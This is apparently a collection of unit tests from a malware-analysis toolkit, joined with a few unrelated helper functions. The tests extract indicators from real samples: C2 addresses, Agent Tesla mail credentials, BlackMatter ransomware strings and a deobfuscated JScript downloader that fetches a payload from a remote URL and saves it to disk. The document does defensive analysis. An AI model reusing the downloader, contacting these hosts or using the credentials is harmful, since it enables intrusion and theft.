def test_shellcode_loader(self):
data = self.download_sample(
'58ba30052d249805caae0107a0e2a5a3cb85f3000ba5479fafb7767e2a5a78f3')
pipeline = load_pipeline(
'rex yara:50607080.* [| struct LL{s:L}{} | xor -B2 accu[s]:@msvc | xtp url ]'
)
self.assertEqual(str(data | pipeline), 'http://64.235.39' '.82')
def test_remcos_sample(self):
data = self.download_sample(
'c0019718c4d4538452affb97c70d16b7af3e4816d059010c277c4e579075c944')
pipeline = load_pipeline(
'perc SETTINGS [| put keylen cut::1 | rc4 cut::keylen | xtp socket ]'
)
self.assertEqual('remm.duckdns' '.' 'org:7007', str(data | pipeline))
def test_sockaddr_decoding(self):
pipeline = load_pipeline(
'emit "0x51110002 0xAFBAFA12" | pack -B4 | struct 2x{port:!H}{addr:4}{} ['
' | push var:addr [| pack -R [| sep . ]| pop addr ]| cfmt {addr}:{port} ]'
)
result = pipeline()
self.assertEqual(result, B'18.250.186.175:4433')
def test_pe_extraction_from_pcap(self):
data = self.download_sample(
'1baf0e669f38b94487b671fab59929129b5b1c2755bc00510812e8a96a53e10e')
pipeline = load_pipeline('pcap-http [| pick 3 ]')
chunk = next(data | pipeline)
self.assertEqual(chunk['url'], B'http://www.tao168188'
B'.com:1046/mh.exe')
self.assertEqual(
hashlib.sha256(chunk).hexdigest(),
'9972394d4d8d51abf15bfaf6c1ddfe9c8bf85ae0b9b0a561adfd9b4844c520b9')
def filter(self, chunks):
it: Iterable[Chunk] = iter(chunks)
name = self.args.temp
init = self.args.init
data = next(it) if init is None else self.labelled(init)
unit: Unit = load_pipeline('\t'.join(self.args.reduction))
for chunk in it:
data.meta.update(chunk.meta)
data[name] = chunk
unit.args(data)
data[:] = unit.act(data)
yield data
def test_blackmatter_sample(self):
data = self.download_sample(
'c6e2ef30a86baa670590bd21acf5b91822117e0cbe6060060bc5fe0182dace99')
pipeline = load_pipeline(
'push [| vsect .rsrc | struct {KS:L}{} | pop | vsect .data | struct -m L{:{0}}'
'| xor -B4 "accu[KS,1,32]:(A*0x8088405+1)#((KS*A)>>32)" | repl h:00 | carve -n8 printable ]]'
)
strings = str(data | pipeline).splitlines(False)
self.assertIn('Safari/537.36', strings)
self.assertIn('bcdedit /set {current} safeboot network', strings)
self.assertTrue(
any('"bot_company":"%.8x%.8x%.8x%.8x%"' in x for x in strings))
self.assertTrue(
any('BlackMatter Ransomware encrypted all your files!' in x
for x in strings))
def test_agent_tesla_sample(self):
data = self.download_sample(
'fb47a566911905d37bdb464a08ca66b9078f18f10411ce019e9d5ab747571b40')
pipeline = load_pipeline(
R'dnfields [| aes x::32 --iv x::16 -Q | sep ]| rex -M "((??email))\n(.*)\n(.*)\n:Zone" addr={1} pass={2} host={3}'
)
result = str(data | pipeline)
self.assertListEqual(result.splitlines(False), [
'addr=ioanna@pgm'
'-gruop'
'.eu',
'pass=Password2019',
'host=smtp.pgm'
'-gruop'
'.eu',
])
def test_get_request_summary(self):
data = self.download_sample(
'1baf0e669f38b94487b671fab59929129b5b1c2755bc00510812e8a96a53e10e')
pipeline = load_pipeline(R'pcap [| rex "^GET\s[^\s]+" | sep ]')
result = str(data | pipeline)
self.assertEqual(
result, '\n'.join((
'GET /286/pop.asp?url=http://www.puma164.'
'com/pu/39685867.htm?2',
'GET /favicon.ico',
'GET /286//update.txt',
'GET /286/soft/163.exe',
'GET /286/count/count.asp?mac=00-0E-0C-33-1C-80&ver=2007051922&user=00&md5=258a993832e5f435cc3a7ba4791bc3de&pc=BOBTWO',
'GET /mh.exe',
'GET /12.exe',
'GET /286/pop.asp?url=http://59.34.197.'
'164:81/804635/adx352133.asp',
)))
def test_example_02_maldoc(self):
data = self.download_sample(
'ee103f8d64cd8fa884ff6a041db2f7aa403c502f54e26337c606044c2f205394')
pipeline = load_pipeline(
'doctxt | repl drp:c: | carve -s b64 | rev | b64 | rev | ppjscript'
)
self.assertEqual(
str(data | pipeline), '\n'.join((
r'var girlLikeDoor = new ActiveXObject("msxml2.xmlhttp");',
r'girlLikeDoor.open("GET", "http://shoulderelliottd'
r'.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8'
r'?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS", false);',
r'girlLikeDoor.send();',
r'if (girlLikeDoor.status == 200) {',
r' try {',
r' var karolYouGirl = new ActiveXObject("adodb.stream");',
r' karolYouGirl.open;',
r' karolYouGirl.type = 1;',
r' karolYouGirl.write(girlLikeDoor.responsebody);',
r' karolYouGirl.savetofile("c:\\users\\public\\tubeGirlLoad.jpg", 2);',
r' karolYouGirl.close;',
r' } catch (e) {}',
r'}',
)))
def emit(line: str, cell=None):
if cell is not None:
line = line + re.sub(R'[\r\n]+\s*', '\x20', cell)
line = re.sub(R'(?<=\[|\])\x20*\|', '|', line)
load_pipeline.cache_clear()
load_pipeline(F'emit {line}') | FakeTTY()
def test_emit_keeps_metadata_02(self):
with temporary_clipboard('baz'):
pl = load_pipeline('emit bort | push [[| rex (?P<foo>...)t | pop ]| emit | cfmt {foo}{} ]')
pl = bytes(pl())
self.assertEqual(pl, b'borbaz')
def test_emit_keeps_metadata_01(self):
with temporary_clipboard('baz'):
pl = load_pipeline('emit a [| put foo bar | emit | cfmt {foo}{} ]')
pl = bytes(pl())
self.assertEqual(pl, b'barbaz')
def test_simple_01(self):
ps = BR'"C:\\work\\is\\fun\\"'.hex()
result = load_pipeline(
RF'emit H:{ps} | carve -d string [| iffp path ]')
result = result()
self.assertEqual(result, B'C:\\work\\is\\fun\\')
def test_hex_byte_strings(self):
pl = load_pipeline('emit Hello [| cm -2 | cfmt {sha256!r} ]')
self.assertEqual(pl(), b'185f8db32271fe25f561a6fc938b2e264306ec304eda518007d1764826381969')
def test_intrinsic_properties_are_recomputed(self):
pl = load_pipeline('emit FOO-BAR [| cm size | snip :1 | cfmt {size} ]')
self.assertEqual(pl(), B'1')
def test_units_can_overwrite_parent_metavars(self):
out, = load_pipeline('emit ABCD [| rex .... | rex B ]')
self.assertEqual(out['offset'], 1)
def test_scroll_past_invisible_chunks(self):
pl = load_pipeline(
'emit FOO [| push [| rex . | pick :1 | iff size -eq 1 | pop o ]| ccp var:o ]'
)
self.assertEqual(pl(), B'FFOO')
def test_msvc(self):
pl = loader.load_pipeline('emit rep[32]:H:00 [| put s 0xF23CA2 | xor -B2 accu[s]:@msvc ]')
self.assertEqual(pl(),
bytes.fromhex('500BC53065647A48899EE4D7F07166A7643AB3EC9F4343A64DF5C45B4CC4D9B2'))
def test_cheap_variable_is_not_discarded(self):
out, = load_pipeline('emit rep[0x100]:X [| cm sha256 | snip 1: ]')
self.assertIn('sha256', out.meta.keys())
self.assertEqual(out.meta['sha256'], '439d26737c1313821f1b5e953a866e680a3712086f7b27ffc2e3e3f224e04f3f')
def test_costly_variable_is_discarded(self):
out, = load_pipeline('emit rep[0x2000]:X [| cm sha256 | snip 1: ]')
self.assertNotIn('sha256', out.meta.keys())
def test_magic_values_update(self):
pl = load_pipeline('emit FOO-BAR [| cm sha256 | snip :3 | cfmt {sha256} ]')
self.assertEqual(pl(), b'9520437ce8902eb379a7d8aaa98fc4c94eeb07b6684854868fa6f72bf34b0fd3')
def test_filter_empty_chunks(self):
pl = load_pipeline('emit AAA==FCC [| resplit = | b64 | iff | emit . ]')
self.assertEqual(pl(), B'..')
def test_bug_conditional_units_generate_empty_chunks(self):
pipeline = load_pipeline('emit A | rex .. [| iff -t 1 | cfmt boom ]]')
self.assertEqual(pipeline(), B'')
